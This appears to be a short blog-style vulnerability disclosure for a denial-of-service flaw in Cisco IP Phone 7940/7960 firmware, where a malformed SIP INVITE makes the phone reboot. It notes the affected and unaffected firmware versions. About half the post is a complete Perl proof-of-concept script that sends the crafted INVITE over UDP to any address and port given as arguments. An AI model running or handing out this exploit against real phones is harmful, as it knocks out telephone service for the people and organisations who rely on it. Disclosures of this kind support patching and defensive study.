Cisco IP Phone 7940/7960 vulnerable to DoS

Ok, this is bad. Cisco IP Phone 7940/7960 is vulnerable to DoS. After sending a malfored crafted SIP INVITE message, you can cause the IP Phone to reboot. This is due to the phone lacking the function to check the validity of the sipURI field of the remote party. This will affect Cisco IP phone 7940/7960 running firmware P0S3-07-4-00.

Unaffected firmware: POS8-6-0



Ok, so i am not vulnerable. :)

Proof of Concept:

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 " unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);

$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: \r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

#end